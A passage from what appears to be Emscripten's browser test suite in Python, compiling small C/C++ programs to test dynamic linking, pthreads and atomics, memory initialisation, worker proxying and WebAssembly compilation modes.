open('main.cpp', 'w').write(r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
REPORT_RESULT(2);
return 0;
}
''')
open('side.cpp', 'w').write(r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
Popen([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm']).communicate()
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js'])
print('wasm in worker (we can read binary data synchronously there)')
open('pre.js', 'w').write('''
var Module = { dynamicLibraries: ['side.wasm'] };
''')
Popen([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-s', 'WASM=1']).communicate()
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'WASM=1', '--proxy-to-worker'])
print('wasm (will auto-preload since no sync binary reading)')
open('pre.js', 'w').write('''
Module.dynamicLibraries = ['side.wasm'];
''')
# same wasm side module works
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'WASM=1'])
@requires_graphics_hardware
def test_dynamic_link_glemu(self):
open('pre.js', 'w').write('''
Module.dynamicLibraries = ['side.wasm'];
''')
open('main.cpp', 'w').write(r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
REPORT_RESULT(1);
return 0;
}
''')
open('side.cpp', 'w').write(r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
Popen([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-lSDL']).communicate()
self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE=1', '-O2', '-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL', '--pre-js', 'pre.js'])
def test_memory_growth_during_startup(self):
open('data.dat', 'w').write('X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'TOTAL_MEMORY=16MB', '-s', 'TOTAL_STACK=5000', '--preload-file', 'data.dat'])
# pthreads tests
def prep_no_SAB(self):
open('html.html', 'w').write(open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
# Test that the emscripten_ atomics api functions work.
def test_pthread_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=120) # extra time on first test, to be sure to build all libraries
# Test 64-bit atomics.
def test_pthread_64bit_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=90)
# Test 64-bit C++11 atomics.
def test_pthread_64bit_cxx11_atomics(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_cxx11_atomics.cpp'), expected='0', args=opt + pthreads + ['-std=c++11', '-s', 'USE_PTHREADS=1'], timeout=30)
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
def test_pthread_gcc_atomic_fetch_and_op(self):
# We need to resort to using regexes to optimize out SharedArrayBuffer when pthreads are not supported, which is brittle!
# Therefore perform very extensive testing of different codegen modes to catch any problems.
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-O3', '-s', 'AGGRESSIVE_VARIABLE_ELIMINATION=1'], ['-Os'], ['-Oz']]:
for debug in [[], ['-g1'], ['-g2'], ['-g4']]:
for f32 in [[], ['-s', 'PRECISE_F32=1']]:
print(opt, debug, f32)
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp'), expected='0', args=opt + debug + f32 + ['-s', 'TOTAL_MEMORY=64MB', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'WASM=0'], timeout=60)
# 64 bit version of the above test.
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'WASM=0'], timeout=30)
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
def test_pthread_gcc_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'WASM=0'], timeout=30)
# 64 bit version of the above test.
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'WASM=0'], timeout=30)
# Tests the rest of the remaining GCC atomics after the two above tests.
def test_pthread_gcc_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_spinlock.cpp'), expected='800', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'WASM=0'] + arg, timeout=30)
# Test that basic thread creation works.
def test_pthread_create(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [['-s', 'USE_PTHREADS=1'], ['-s', 'USE_PTHREADS=2', '--separate-asm']]:
print(str(opt) + ' ' + str(pthreads))
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'), expected='0', args=opt + pthreads + ['-s', 'TOTAL_MEMORY=64MB', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
if 'USE_PTHREADS=2' in pthreads:
self.prep_no_SAB()
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'), expected='0', args=opt + pthreads + ['-s', 'PTHREAD_POOL_SIZE=8', '--shell-file', 'html.html'], timeout=30)
# Tests the -s PROXY_TO_PTHREAD=1 option.
def test_pthread_proxy_to_pthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxy_to_pthread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'], timeout=30)
# Test that a pthread can spawn another pthread of its own.
def test_pthread_create_pthread(self):
for opt in [['-s', 'USE_PTHREADS=2', '--separate-asm'], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=opt + ['-O3', '-s', 'PTHREAD_POOL_SIZE=2'], timeout=30)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
def test_pthread_nested_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_nested_spawns.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=2'], timeout=30)
# Test that main thread can wait for a pthread to finish via pthread_join().
def test_pthread_join(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_join.cpp'), expected='6765', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=1'], timeout=30)
# Test pthread_cancel() operation
def test_pthread_cancel(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cancel.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test pthread_kill() operation
def test_pthread_kill(self):
if get_browser() and 'chrom' in get_browser().lower():
# This test hangs the chrome render process, and keep subsequent tests from passing too
self.skipTest("pthread_kill hangs chrome renderer")
self.btest(path_from_root('tests', 'pthread', 'test_pthread_kill.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
def test_pthread_cleanup(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cleanup.cpp'), expected='907640832', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Tests the pthread mutex api.
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_mutex.cpp'), expected='50', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, timeout=30)
# Test that memory allocation is thread-safe.
def test_pthread_malloc(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Stress test pthreads allocating memory that will call to sbrk(), and main thread has to free up the data.
def test_pthread_malloc_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc_free.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'TOTAL_MEMORY=256MB'], timeout=30)
# Test that the pthread_barrier API works ok.
def test_pthread_barrier(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_barrier.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test the pthread_once() function.
def test_pthread_once(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_once.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test against a certain thread exit time handling bug by spawning tons of threads.
def test_pthread_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_spawns.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_volatile.cpp'), expected='1', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, timeout=30)
# Test thread-specific data (TLS).
def test_pthread_thread_local_storage(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_thread_local_storage.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test the pthread condition variable creation and waiting.
def test_pthread_condition_variable(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_condition_variable.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test that pthreads are able to do printf.
def test_pthread_printf(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_printf.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=1'], timeout=30)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
def test_pthread_iostream(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_iostream.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=1'], timeout=30)
# Test that the main thread is able to use pthread_set/getspecific.
def test_pthread_setspecific_mainthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm'], timeout=30)
self.prep_no_SAB()
self.btest(path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '--shell-file', 'html.html', '-s', 'WASM=0'], timeout=30)
# Test the -s PTHREAD_HINT_NUM_CORES=x command line variable.
def test_pthread_num_logical_cores(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_num_logical_cores.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_HINT_NUM_CORES=2'], timeout=30)
self.prep_no_SAB()
self.btest(path_from_root('tests', 'pthread', 'test_pthread_num_logical_cores.cpp'), expected='0', args=['-O3', '-g', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_HINT_NUM_CORES=2', '--shell-file', 'html.html', '-s', 'WASM=0'], timeout=30)
# Test that pthreads have access to filesystem.
def test_pthread_file_io(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_file_io.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=1'], timeout=30)
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_supported.cpp'), expected='0', args=['-O3'] + args, timeout=30)
def test_pthread_separate_asm_pthreads(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '--profiling'], timeout=30)
def test_pthread_custom_pthread_main_url(self):
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'cdn'))
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
int result = 0;
void *thread_main(void *arg) {
emscripten_atomic_store_u32(&result, 1);
pthread_exit(0);
}
int main() {
pthread_t t;
if (emscripten_has_threading_support()) {
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
} else {
result = 1;
}
REPORT_RESULT(result);
}
'''))
# Test that it is possible to define "Module.locateFile" string to locate where pthread-main.js will be loaded from.
open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test.html']).communicate()
shutil.move('pthread-main.js', os.path.join('cdn', 'pthread-main.js'))
self.run_browser('test.html', '', '/report_result?1')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where pthread-main.js will be loaded from.
open(self.in_dir('shell2.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "pthread-main.js") return "cdn/pthread-main.js"; else return filename; }, '))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell2.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test2.html']).communicate()
try_delete('pthread-main.js')
self.run_browser('test2.html', '', '/report_result?1')
# Test that if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), that it's not a deadlock.
def test_pthread_proxying_in_futex_wait(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxying_in_futex_wait.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '-s', 'PTHREAD_POOL_SIZE=1', '--separate-asm'], timeout=30)
# Test that sbrk() operates properly in multithreaded conditions
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest(path_from_root('tests', 'pthread', 'test_pthread_sbrk.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'TOTAL_MEMORY=128MB'], timeout=30)
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts, timeout=30)
# Test that the proxying operations of user code from pthreads to main thread work
def test_pthread_run_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '-s', 'PTHREAD_POOL_SIZE=1', '--separate-asm'], timeout=30)
# Test how a lot of back-to-back called proxying operations behave.
def test_pthread_run_on_main_thread_flood(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread_flood.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '-s', 'PTHREAD_POOL_SIZE=1', '--separate-asm'], timeout=30)
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
def test_pthread_call_sync_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
def test_pthread_call_async_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
def test_pthread_global_data_initialization(self):
for mem_init_mode in [[], ['--memory-init-file', '0'], ['--memory-init-file', '1'], ['-s', 'MEM_INIT_METHOD=2']]:
for args in [[], ['-O3']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
def test_pthread_clock_drift(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_clock_drift.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# test atomicrmw i64
def test_atomicrmw_i64(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
Popen([PYTHON, EMCC, path_from_root('tests', 'atomicrmw_i64.ll'), '-s', 'USE_PTHREADS=1', '-s', 'IN_TEST_HARNESS=1', '-o', 'test.html', '-s', 'WASM=0']).communicate()
self.run_browser('test.html', None, '/report_result?0')
# Test that it is possible to send a signal via calling alarm(timeout), which in turn calls to the signal handler set by signal(SIGALRM, func);
def test_sigalrm(self):
self.btest(path_from_root('tests', 'sigalrm.cpp'), expected='0', args=['-O3'], timeout=30)
def test_meminit_pairs(self):
d = 'const char *data[] = {\n "'
d += '",\n "'.join(''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256))
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1", '-s', 'WASM=0']
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
def test_meminit_big(self):
d = 'const char *data[] = {\n "'
d += '",\n "'.join([''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256)] * 256)
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
assert len(d) > (1 << 27) # more than 32M memory initializer
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1", '-s', 'WASM=0']
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests/canvas_style_proxy_shell.html'), '--pre-js', path_from_root('tests/canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(path_from_root('tests', 'canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(path_from_root('tests', 'custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests', 'custom_messages_proxy_shell.html'), '--post-js', path_from_root('tests', 'custom_messages_proxy_postjs.js')])
def test_separate_asm(self):
for opts in [['-O0'], ['-O1'], ['-O2'], ['-O2', '--closure', '1']]:
print(opts)
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
run_process([PYTHON, EMCC, 'src.cpp', '-o', 'test.html', '-s', 'WASM=0'] + opts)
self.run_browser('test.html', None, '/report_result?0')
print('run one')
open('one.html', 'w').write('<script src="test.js"></script>')
self.run_browser('one.html', None, '/report_result?0')
print('run two')
run_process([PYTHON, path_from_root('tools', 'separate_asm.py'), 'test.js', 'asm.js', 'rest.js'])
open('two.html', 'w').write('''
<script>
var Module = {};
</script>
<script src="asm.js"></script>
<script src="rest.js"></script>
''')
self.run_browser('two.html', None, '/report_result?0')
print('run hello world')
self.clear()
assert not os.path.exists('tests.asm.js')
self.btest('browser_test_hello_world.c', expected='0', args=opts + ['-s', 'WASM=0', '--separate-asm'])
assert os.path.exists('test.asm.js')
os.unlink('test.asm.js')
print('see a fail')
self.run_browser('test.html', None, '[no http server activity]', timeout=5) # fail without the asm
def test_emterpretify_file(self):
open('shell.html', 'w').write('''
<!--
{{{ SCRIPT }}} // ignore this, we do it ourselves
-->
<script>
var Module = {};
var xhr = new XMLHttpRequest();
xhr.open('GET', 'code.dat', true);
xhr.responseType = 'arraybuffer';
xhr.onload = function() {
Module.emterpreterFile = xhr.response;
var script = document.createElement('script');
script.src = "test.js";
document.body.appendChild(script);
};
xhr.send(null);
</script>
''')
try_delete('code.dat')
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '--shell-file', 'shell.html', '-s', 'ASSERTIONS=1'])
assert os.path.exists('code.dat')
try_delete('code.dat')
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '-s', 'ASSERTIONS=1'])
assert os.path.exists('code.dat')
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker']).communicate()
open('test.html', 'w').write('<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-s', 'WASM=0']
print('plain html')
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'in_flight_memfile_request.c')).read()))
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'test.js'] + opts).communicate()
open('test.html', 'w').write('<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
def test_split_memory_large_file(self):
size = 2 * 1024 * 1024
open('huge.dat', 'wb').write(bytearray((x * x) & 255 for x in range(size * 2))) # larger than a memory chunk
self.btest('split_memory_large_file.cpp', expected='1', args=['-s', 'WASM=0', '-s', 'SPLIT_MEMORY=' + str(size), '-s', 'TOTAL_MEMORY=128MB', '-s', 'TOTAL_STACK=10240', '--preload-file', 'huge.dat'], timeout=60)
def test_binaryen_interpreter(self):
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'BINARYEN=1', '-s', 'BINARYEN_METHOD="interpret-binary"'])
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'BINARYEN=1', '-s', 'BINARYEN_METHOD="interpret-binary"', '-O2'])
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['-s', 'WASM=1', '--shell-file', 'shell.html']
for opts, expect in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
